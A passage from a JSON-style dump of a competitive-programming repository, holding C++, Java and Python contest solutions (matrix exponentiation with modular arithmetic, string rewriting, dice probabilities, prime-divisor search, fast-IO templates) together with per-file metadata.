fori(n) forj(m) a[i][j] = rhs[i][j];\n }\n \n matrix(const vector<T>& rhs)\n {\n n = size(rhs);\n m = 1;\n a.resize(n, valarray<T>(0, 1));\n fori(n) a[i] = rhs[i];\n }\n\n matrix(const valarray<T>& rhs)\n {\n n = size(rhs);\n m = 1;\n a.resize(n, valarray<T>(0, 1));\n fori(n) a[i] = rhs[i];\n }\n\n matrix(const matrix<T>& rhs) : n(rhs.n), m(rhs.m), a(rhs.a) {}\n\n matrix& operator=(const matrix& rhs)\n {\n if (&rhs == this)\n return *this;\n matrix temp(rhs);\n swap(*this, temp);\n return *this;\n }\n\n matrix& operator=(const T& rhs)\n {\n matrix temp(n, m, rhs);\n swap(*this, temp);\n return *this;\n }\n\n matrix& operator=(const valarray<T>& rhs)\n {\n matrix temp(size(rhs), 1, 0);\n fori(temp.n) a[i][0] = rhs[i];\n swap(*this, temp);\n return *this;\n }\n\n valarray<T>& operator[](int i) { return a[i]; }\n const valarray<T>& operator[](int i) const { return a[i]; }\n\n matrix& operator+=(const matrix& rhs) { a += rhs.a; return *this; }\n matrix& operator-=(const matrix& rhs) { a -= rhs.a; return *this; }\n 
matrix& operator+=(const T& rhs) { fori(n) a[i] += rhs; return *this; }\n matrix& operator-=(const T& rhs) { fori(n) a[i] -= rhs; return *this; }\n matrix& operator*=(const T& rhs) { fori(n) a[i] *= rhs; return *this; }\n matrix& operator/=(const T& rhs) { fori(n) a[i] /= rhs; return *this; }\n matrix& operator%=(const T& rhs) { fori(n) a[i] %= rhs; return *this; }\n matrix& operator*=(const matrix& rhs) {\n assert(m == rhs.n);\n matrix temp(n, rhs.m, 0);\n fori(n) forj(m) forn(k, rhs.m) temp.a[i][k] += a[i][j] * rhs[j][k];\n return *this = temp;\n }\n\n matrix& operator|=(const matrix& rhs) {\n assert(n == rhs.n);\n matrix temp(n, m + rhs.m, 0);\n fori(n) forj(m) temp[i][j] = a[i][j];\n fori(n) forj(rhs.m) temp[i][j + m] = rhs[i][j];\n return *this = temp;\n }\n\n matrix& operator^=(ll i) {\n assert(i >= 0);\n if (i == 0) return *this = matrix(n, m);\n return *this = binpow(*this, std::abs(i));\n }\n template<typename T1>\n valarray<T> operator*(const valarray<T1>& rhs) {\n assert(m == size(rhs));\n valarray<T1> ans(n);\n fori(n) forn(k, m) ans[i] += a[i][k] * rhs[k];\n return ans;\n }\n template<typename T1>\n friend valarray<T1> operator*(const valarray<T1>& lhs, const matrix& rhs) {\n assert(size(lhs) == rhs.n);\n valarray<T1> ans = {{0, 0, 0, 0, 0}, {0, 0, 0, 0, 0}, {0, 0, 0, 0, 0}, {0, 0, 0, 0, 0}, {0, 0, 0, 0, 0}};\n forj(rhs.m) forn(k, rhs.n) ans[j] += lhs[k] * rhs[k][j];\n return ans;\n }\n matrix operator-() { return *this *= -1; }\n\n friend matrix operator+(matrix lhs, const matrix& rhs) { lhs += rhs; return lhs; }\n friend matrix operator-(matrix lhs, const matrix& rhs) { lhs += rhs; return lhs; }\n friend matrix operator*(matrix lhs, const matrix& rhs) { lhs *= rhs; return lhs; }\n friend matrix operator|(matrix lhs, const matrix& rhs) { lhs |= rhs; return lhs; }\n friend matrix operator+(matrix lhs, const T& rhs) { lhs += rhs; return lhs; }\n friend matrix operator-(matrix lhs, const T& rhs) { lhs -= rhs; return lhs; }\n friend matrix 
operator*(matrix lhs, const T& rhs) { lhs *= rhs; return lhs; }\n friend matrix operator/(matrix lhs, const T& rhs) { lhs /= rhs; return lhs; }\n friend matrix operator%(matrix lhs, const T& rhs) { lhs %= rhs; return lhs; }\n friend matrix operator^(matrix lhs, const ll& rhs) { lhs ^= rhs; return lhs; }\n matrix operator|=(const valarray<T>& rhs) { return *this |= matrix(rhs); }\n T max() { return a.max(); }\n T min() { return a.min(); }\n T sum() { return a.sum(); }\n\n matrix transpose() {\n matrix temp(m, n, 0);\n fori(n) forj(m) temp[i][j] = a[j][i];\n return temp;\n }\n\n T normalize(int index) {\n T g = 1;\n bool found = false;\n for (T& x: a[index])\n if (x != 0)\n {\n if (not found) g = x, found = true;\n else g = gcd(g, x);\n }\n a[index] /= g;\n return g;\n }\n\n void normalize() {\n fori(n) normalize(i);\n }\n\n T determinant() {\n matrix temp(*this);\n T numerator = 1;\n T denumerator = 1;\n fori(n)\n {\n int nonZero = i;\n while (nonZero < n && !temp[nonZero][i]) ++nonZero;\n if (nonZero == n) return 0;\n\n swap(temp[i], temp[nonZero]);\n numerator *= temp[i][i];\n\n FOR(j, i + 1, n)\n if (temp[j][i])\n {\n T g = gcd(temp[i][i], temp[j][i]);\n denumerator *= temp[i][i] / g;\n temp[j] = temp[j] * (temp[i][i] / g) - temp[i] * (temp[j][i] / g);\n }\n }\n writeln(temp); writeln();\n return numerator / denumerator;\n }\n\n optional<pair<T, matrix<T>>> invert() {\n assert(n == m);\n matrix temp(*this);\n temp |= matrix(n, n);\n\n auto det = solve(temp);\n if (!det.has_value()) return {};\n\n matrix ret(n, n, 0);\n auto s = slice(n, n, 1);\n fori(n) ret[i] = temp[i][s];\n return pair(det.value(), ret);\n }\n\n optional<pair<T, valarray<T>>> solution(const valarray<T>& b) {\n assert(n == m);\n matrix temp(*this);\n temp |= b;\n\n auto det = solve(temp);\n if (!det.has_value()) return {};\n\n valarray<T> ret(0, n);\n fori(n) ret[i] = temp[i][n];\n return pair(det.value(), ret);\n }\n\n friend ostream& operator<<(ostream& os, matrix rhs) {\n fori(rhs.n)\n {\n os 
<< rhs.a[i];\n if (i != rhs.n - 1) os << \"\\n\";\n }\n return os;\n }\n friend istream& operator>>(istream& is, matrix& rhs) {\n fori(rhs.n) is >> rhs.a[i];\n return is;\n }\n\nprivate:\n valarray<valarray<T>> a;\n int n, m;\n\n static optional<T> solve(matrix& temp) {\n vector<int> permutation(temp.n);\n iota(whole(permutation), 0);\n\n auto get = [&](int i, int j) {\n return temp[permutation[i]][j];\n };\n auto findNonZero = [&](int i) {\n int nonZero = i;\n while (nonZero < temp.n && !get(nonZero, i)) ++nonZero;\n return nonZero;\n };\n fori(temp.n)\n {\n int nonZero = findNonZero(i);\n if (nonZero == temp.n) return {};\n swap(permutation[i], permutation[nonZero]);\n FOR(j, i + 1, temp.n)\n if (get(j, i))\n temp[permutation[j]] = temp[permutation[j]] * get(i, i) - temp[permutation[i]] * get(j, i),\n temp.normalize(permutation[j]);\n }\n ROF(i, temp.n - 1, 0)\n ROF(j, i - 1, 0)\n if (get(j, i))\n temp[permutation[j]] = temp[permutation[j]] * get(i, i) - temp[permutation[i]] * get(j, i),\n temp.normalize(permutation[j]);\n fori(temp.n) temp.normalize(i);\n T mx = 0;\n fori(temp.n) mx = std::max(mx, abs(get(i, i)));\n fori(temp.n) temp[permutation[i]] *= mx / get(i, i);\n matrix ret(temp.n, temp.m, 0);\n fori(temp.n) ret[i] = temp[permutation[i]];\n temp = ret;\n return mx;\n }\n};\n\n//binpowmod\ntemplate<typename T>\nT binpowmod(T a, ll n, T mod)\n{\n assert(n > 0);\n T res = a; --n;\n while (n > 0)\n {\n if (n & 1)\n res = (res * a) % mod;\n a = (a * a) % mod;\n n >>= 1;\n }\n return res;\n}\n//binpow\n\ntemplate<typename T>\nT binpow(T a, ll n)\n{\n assert(n > 0);\n T res = a; --n;\n while (n > 0)\n {\n if (n & 1)\n res *= a;\n a *= a;\n n >>= 1;\n }\n return res;\n}\n\n//modular\ntemplate<typename T = int, T mod = 1000000007>\nstruct modular\n{\n T value = 0;\n\n modular(){}\n modular(const modular& other) : value(other.value) {}\n modular operator=(const modular& other) { value = other.value; return *this; }\n template<typename T1> modular operator=(const 
T1& other) { value = other % mod; if (value < 0) value += mod; return *this; }\n template<typename T1> modular(T1 const& t) { value = t % mod; if (value < 0) value += mod; }\n template<typename T1> modular(T1 const& num, T1 const& den) { value = num * 1ll * binpowmod<ll>(den, mod - 2, mod) % mod; }\n template<typename T1> modular& operator^=(T1 const& deg) { value = binpowmod<ll>(value, deg, mod); return *this; }\n template<typename T1> modular operator^ (T1 const& deg) const { return modular(*this) ^= deg; }\n inline modular& operator+=(modular const& t) { value += t.value; if (value > mod) value -= mod; return *this; }\n inline modular& operator-=(modular const& t) { value -= t.value; if (value < 0 ) value += mod; return *this; }\n inline modular& operator*=(modular const& t) { value = (value * 1ll * t.value) % mod; return *this; }\n inline modular operator+ (modular const& t) const { return modular(*this) += t; }\n inline modular operator- (modular const& t) const { return modular(*this) -= t; }\n inline modular operator* (modular const& t) const { return modular(*this) *= t; }\n\n inline friend ostream& operator<<(ostream& os, modular const& m) { return os << m.value; }\n inline friend istream& operator>>(istream& is, modular& m) { return is >> m.value; m.value %= mod; }\n};\n\n//Igorjan\n//}}}\n\ntypedef modular<int, MOD - 1> modDeg;\ntypedef modular<int, MOD> modAns;\nvoid run()\n{\n valarray<valarray<modDeg>> coeffs = {\n {1, 0, 0, 0, 0},\n {0, 4, 0, 0, 0},\n {0, 0, 1, 0, 0},\n {0, 0, 0, 1, 0},\n {0, 0, 0, 0, 1}\n };\n valarray<valarray<modDeg>> mm = {\n {1, 1, 0, 0, -6},\n {0, 1, 0, 0, 2},\n {0, 0, 0, 0, 1},\n {0, 0, 1, 0, 1},\n {0, 0, 0, 1, 1}\n };\n matrix<modDeg> m = mm;\n\n ll d;\n valarray<modAns> v(3);\n modAns c;\n readln(d, v, c);\n valarray<modDeg> x = (coeffs * (m ^ (d - 3)))[4];\n modAns ans = c ^ (x[0] + x[1]).value;\n fori(3)\n ans *= v[i] ^ x[i + 2].value;\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = 
clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>const&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>const&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>const&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4413597881793976, "alphanum_fraction": 0.44702550768852234, "avg_line_length": 22.53333282470703, "blob_id": "9cac7a9fedb7377793caa7f004a4c7c1bcf947ec", "content_id": "d29b62faffb0d6b6e0584b701edc55e760b0b0d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1765, "license_type": "no_license", "max_line_length": 78, "num_lines": 75, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.23/B.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\nimport java.io.*;\nimport java.util.*;\n \npublic class B {\n int n;\n String[] a, b;\n \n int get(String f, String t) {\n if (f.equals(t)) {\n return 0;\n }\n \n int min = 16;\n for (int i = 0; i < n; i++) {\n if (f.contains(a[i])) {\n String s = f.replace(a[i], b[i]);\n if (s.length() <= t.length()) {\n min = 
Math.min(min, get(s, t));\n }\n }\n }\n \n return min + 1;\n }\n \n void run() {\n while (true) {\n n = nextInt();\n if (n == 0) {\n return;\n }\n \n a = new String[n];\n b = new String[n];\n \n for (int i = 0; i < n; i++) {\n a[i] = next();\n b[i] = next();\n }\n int ans = get(next(), next());\n out.println(ans > 10 ? -1 : ans);\n }\n }\n \n static StringTokenizer stringTokenizer;\n static BufferedReader bufferedReader;\n static PrintWriter out;\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n \n String next() {\n while (stringTokenizer == null || !stringTokenizer.hasMoreTokens()) {\n stringTokenizer = new StringTokenizer(nextLine());\n }\n return stringTokenizer.nextToken();\n }\n \n String nextLine() {\n try {\n return bufferedReader.readLine();\n } catch (IOException e) {\n return \"\";\n }\n }\n \n public static void main(String[] args) throws IOException {\n bufferedReader = new BufferedReader(new InputStreamReader(System.in));\n out = new PrintWriter(System.out);\n new B().run();\n bufferedReader.close();\n out.close();\n }\n}" }, { "alpha_fraction": 0.3154296875, "alphanum_fraction": 0.35693359375, "avg_line_length": 21.755556106567383, "blob_id": "d81cfb251879ea8651850b48aea523a43bf13203", "content_id": "23f797d32e8cbe6f373c39d18905b0239441d2a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2048, "license_type": "no_license", "max_line_length": 83, "num_lines": 90, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.14/EWA4.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <stack>\n#include <cstdio>\n#include <vector>\n#include <algorithm>\n \nusing namespace std;\n \nlong long res = 0, ost = 0;\n \nint inf = 1e+9 + 9;\n \n \nint n, cnt[1000500], ans[1000500];\nvector <int> mp[1000500], a, b;\nvector <int> bb[1000500];\nint main(){\n freopen(\"gcs.in\", \"r\", stdin);\n int n = 0;\n string s;\n getline (cin, s);\n s += ' ';\n int num = 
0;\n for (int i = 0; i < s.length(); ++i){\n if (s[i] == ' '){\n a.push_back(num);\n num = 0;\n }\n else\n num = num * 10 + (s[i] - '0');\n }\n getline (cin, s);\n s += ' ';\n num = 0;\n for (int i = 0; i < s.length(); ++i){\n if (s[i] == ' '){\n b.push_back(num);\n num = 0;\n }\n else\n num = num * 10 + (s[i] - '0');\n }\n for (int i = 0; i < 1000500; ++i){\n cnt[i] = -1;\n }\n for (int i = 0; i < a.size(); ++i){\n mp[a[i]].push_back(i);\n cnt[a[i]]++;\n }\n for (int i = 0; i < b.size(); ++i){\n if (cnt[b[i]] == -1 || cnt[b[i]] >= mp[b[i]].size())\n bb[i].push_back(-1);\n else\n bb[i] = mp[b[i]];\n }\n int border = 1000500;\n ans[0] = -1 * inf;\n for (int i = 1; i < border; ++i){\n ans[i] = inf;\n }\n \n for (int i = 0; i < b.size(); ++i){\n int x = bb[i][bb[i].size() - 1];\n if (!(x + 1))\n continue;\n int r = border;\n int l = 0, m;\n while (r > l + 1){\n m = (r + l) / 2;\n if (ans[m] > x)\n r = m;\n else l = m;\n }\n ans[r] = x;\n // cout << x << \" \";\n int cnt = 1;\n while (cnt < bb[i].size() + 1 && bb[i][bb[i].size() - cnt] >= ans[r - 1] &&\n bb[i][bb[i].size() - cnt] < ans[r + 1])\n cnt++;\n cnt--;\n ans[r] = bb[i][bb[i].size() - cnt];\n }\n for (int i = 1; i < border; ++i){\n if (ans[i] == inf && i < 100){\n cout << i - 1 << '\\n';\n return 0;\n }\n }\n \n}\n" }, { "alpha_fraction": 0.2850729525089264, "alphanum_fraction": 0.3086419701576233, "avg_line_length": 23.75, "blob_id": "1c41baf60af746d9ba6e898d9fc9a4b311c3ab70", "content_id": "0d58626042a8c31642d7aeafdd3485d7670a2d07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 891, "license_type": "no_license", "max_line_length": 51, "num_lines": 36, "path": "/2017/fbhcQual/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "t = int(input())\nfor q in range(t):\n h, n = map(int, input().split())\n ans = 0.0\n for s in input().split():\n z = 0\n a = s.split('+')\n if len(a) == 2:\n z = int(a[1])\n s = a[0]\n else:\n a = 
s.split('-')\n if len(a) == 2:\n z = -int(a[1])\n s = a[0]\n x, y = map(int, s.split('d'))\n\n l = x * y + 1\n res = [0] * l\n res[0] = 1\n for i in range(x):\n nex = [0] * l\n for j in range(l - y):\n if res[j] > 0:\n for k in range(1, y + 1):\n nex[j + k] += res[j]\n res = nex\n ok = sum(res)\n d = 0\n for i in range(l):\n if i + z >= h:\n d += res[i]\n ans = max(ans, d / ok)\n\n\n print(\"Case #{:d}: {:.10f}\".format(q + 1, ans))\n" }, { "alpha_fraction": 0.5021065473556519, "alphanum_fraction": 0.5234200954437256, "avg_line_length": 31.80487823486328, "blob_id": "0b057b23e22718d13156718bb2bb9fcb5cec2b7e", "content_id": "2829aed66b4363e06b1601630e697ef74f492459", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4035, "license_type": "no_license", "max_line_length": 174, "num_lines": 123, "path": "/CodeForce/1305/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 14 september 2019 (writeln<T>, main) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) begin(a), end(a)\n#define next next__\n#define prev prev__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... 
Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//sieve\nvector<bool> sieve(int n)\n{\n vector<bool> x(n, true);\n x[0] = x[1] = false;\n for (int i = 2; i < n; i++)\n if (x[i])\n for (int j = i * 2; j < n; j += i)\n x[j] = false;\n return x;\n}\n\n//}}}\n\nstatic const int N = 2000000;\nvoid run()\n{\n auto isPrime = sieve(N);\n mt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n ints(n);\n vector<ll> a(n);\n readln(a);\n vector<ll> b = a;\n sort(whole(b));\n b.erase(unique(whole(b)), b.end());\n shuffle(whole(a), rng);\n shuffle(whole(b), rng);\n vector<ll> c;\n b.resize(30);\n auto add = [&](ll x) {\n if (x >= N || isPrime[x])\n c.pb(x);\n };\n for (ll& X: b)\n FOR(i, -1, 2)\n if (ll x = X + i; x > 1)\n {\n for (ll k = 1; k * k <= x; k++)\n if (x % k == 0)\n add(k),\n add(x / k);\n }\n sort(whole(c));\n c.erase(unique(whole(c)), c.end());\n\n ll ans = n + 2;\n for (ll& x: c)\n if (x > 1)\n {\n ll cnt = 0;\n for (int i = 0; i < n && cnt < ans; ++i)\n if (a[i] <= x)\n cnt += x - a[i];\n else\n {\n ll temp = a[i] % x;\n cnt += min(temp, x - temp);\n }\n ans = min(ans, cnt);\n }\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i 
ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5621445775032043, "alphanum_fraction": 0.5702680945396423, "avg_line_length": 27.298851013183594, "blob_id": "33e20efe3e4c867d00292dd32d44ec01d73fa768", "content_id": "93354b7423540c6a5793578718432ab3ffc64d2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2462, "license_type": "no_license", "max_line_length": 94, "num_lines": 87, "path": "/staff/main.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import os\nimport sys\n\nif 'PyPy' in sys.version: # {{{\n from _continuation import continulet\nelse:\n import threading\nfrom io import BytesIO, IOBase\n\nBUFSIZE = 8192\n\nclass FastIO(IOBase):\n newlines = 0\n\n def __init__(self, file):\n self._fd = file.fileno()\n self.buffer = BytesIO()\n self.writable = \"x\" in file.mode or \"r\" not in file.mode\n self.write = self.buffer.write if self.writable else None\n\n def read(self):\n while True:\n b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))\n if not b:\n break\n ptr = self.buffer.tell()\n self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)\n self.newlines = 0\n return self.buffer.read()\n\n def readline(self):\n while self.newlines == 0:\n b = 
os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))\n self.newlines = b.count(b\"\\n\") + (not b)\n ptr = self.buffer.tell()\n self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)\n self.newlines -= 1\n return self.buffer.readline()\n\n def flush(self):\n if self.writable:\n os.write(self._fd, self.buffer.getvalue())\n self.buffer.truncate(0), self.buffer.seek(0)\n\n\nclass IOWrapper(IOBase):\n def __init__(self, file):\n self.buffer = FastIO(file)\n self.flush = self.buffer.flush\n self.writable = self.buffer.writable\n self.write = lambda s: self.buffer.write(s.encode(\"ascii\"))\n self.read = lambda: self.buffer.read().decode(\"ascii\")\n self.readline = lambda: self.buffer.readline().decode(\"ascii\")\n\n\nsys.stdin, sys.stdout = IOWrapper(sys.stdin), IOWrapper(sys.stdout)\ninput = lambda: sys.stdin.readline().rstrip(\"\\r\\n\")\n# }}}\n\ndef read():\n return list(map(int, input().split()))\n\ndef main():\n [n] = read()\n a = read()\n print(*sorted(a))\n\nif __name__ == '__main__': # {{{\n if 'PyPy' in sys.version:\n\n def bootstrap(cont):\n call, arg = cont.switch()\n while True:\n call, arg = cont.switch(to=continulet(lambda _, f, args: f(*args), call, arg))\n\n cont = continulet(bootstrap)\n cont.switch()\n\n main()\n\n else:\n sys.setrecursionlimit(1 << 30)\n threading.stack_size(1 << 27)\n\n main_thread = threading.Thread(target=main)\n main_thread.start()\n main_thread.join() # }}}\n" }, { "alpha_fraction": 0.4815465807914734, "alphanum_fraction": 0.4920913875102997, "avg_line_length": 19.321428298950195, "blob_id": "7b46a6688bc772a89aba50145573f57fc3d3548a", "content_id": "2f37635f037c805b3dd98b93b422d75b03997678", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 569, "license_type": "no_license", "max_line_length": 45, "num_lines": 28, "path": "/wordsLetters/words.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nimport collections\nimport 
re\n\ndef get(s):\n m = collections.defaultdict(lambda: 0)\n for c in re.sub(f'[^\\w]', '', s.lower()):\n m[c] += 1\n return m\n\ndef output(f):\n for k in sorted(f.keys()):\n if f[k] != 0:\n print(k, f[k])\n print(\"==========================\")\n\ndef sub(f, t):\n ans = collections.defaultdict(lambda: 0)\n for k in f:\n ans[k] = f[k]\n for k in t:\n ans[k] -= t[k]\n return ans\n\nd = get(open(\"./dict.txt\").readline()[:-1])\noutput(d)\nfor s in sys.stdin:\n output(sub(d, get(s[:-1])))\n" }, { "alpha_fraction": 0.4577777683734894, "alphanum_fraction": 0.47555556893348694, "avg_line_length": 13, "blob_id": "7a78721bc614796afad721f0a0bd88bed3dba303", "content_id": "1045e111764465563b78db18e89338b46f84f65f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 225, "license_type": "no_license", "max_line_length": 32, "num_lines": 15, "path": "/trains/ai/cpp-cgdk/new/cpp-cgdk/model/CarType.h", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#pragma once\r\n\r\n#ifndef _CAR_TYPE_H_\r\n#define _CAR_TYPE_H_\r\n\r\nnamespace model {\r\n enum CarType {\r\n _UNKNOWN_CAR_TYPE_ = -1,\r\n BUGGY = 0,\r\n JEEP = 1,\r\n _CAR_TYPE_COUNT_ = 2\r\n };\r\n}\r\n\r\n#endif\r\n" }, { "alpha_fraction": 0.44524794816970825, "alphanum_fraction": 0.4655647277832031, "avg_line_length": 28.632652282714844, "blob_id": "55208c694d8db1ccb4fde518460cb78462d6ddde", "content_id": "de9ce690f773ee413090ad7e88c33de923c7e5a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2904, "license_type": "no_license", "max_line_length": 928, "num_lines": 98, "path": "/2013/2013FBHC/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <math.h>\n#include <algorithm>\n#include <queue>\n#include <map>\n\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll unsigned 
long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define vi vector<int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"start\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nint d1 = 0, d2 = 0;\nll s1 = 0, s2 = 0, mx, sum1 = 0, sum2 = 0;\nvector< vi > a;\nvector<ll> r;\nint fl = 0;\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n cout << (f[i] != 0 ? f[i] : (mx - r[i])) << (i == f.size() - 1 ? 
'\\n' : ' ');\n}\n\nvoid readln(vector<int> &f, int n, int z)\n{\n int x;\n forn(i, n)\n {\n read(x);\n f.push_back(x);\n r[i] += x;\n if (i == z)\n s1 += x;\n if (i == n - z - 1)\n s2 += x;\n if (x == 0)\n {\n if (i == z)\n d1++;\n if (i == n - z - 1)\n d2++;\n }\n }\n if (z == n - z - 1)\n fl = 1;\n}\n\nvoid run()\n{\n int n;\n readln(n);\n a.resize(n);\n r.resize(n, 0);\n forn(i, n)\n readln(a[i], n, i);\n mx = *max_element(r.begin(), r.end());\n ll ss1 = 0, ss2 = 0;\n forn(i, n)\n {\n if (a[i][i] == 0)\n ss1 += mx - r[i];\n if (a[i][n - i - 1] == 0)\n ss2 += mx - r[n - i - 1];\n }\n mx = max(s1 + ss1, max(mx, s2 + ss2));\n if (d1 == 0)\n mx = s1;\n else\n if (d2 == 0)\n mx = s2;\n else\n mx++;\n forn(i, n)\n writeln(a[i]);\n}\n\nint main()\n{\n freopen(\"e.in\", \"r\", stdin);\n freopen(\"e.out\", \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.4736842215061188, "alphanum_fraction": 0.5087719559669495, "avg_line_length": 16, "blob_id": "9fcbfee7306b39561878d695ca6bcad4d0c4cabe", "content_id": "ad11327998995e84ef417d40a13e752af23ebb59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 57, "license_type": "no_license", "max_line_length": 26, "num_lines": 3, "path": "/CodeForce/0409/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": " PROGRAM hello\n PRINT*, 'FORTRAN 77'\n END\n" }, { "alpha_fraction": 0.5584642291069031, "alphanum_fraction": 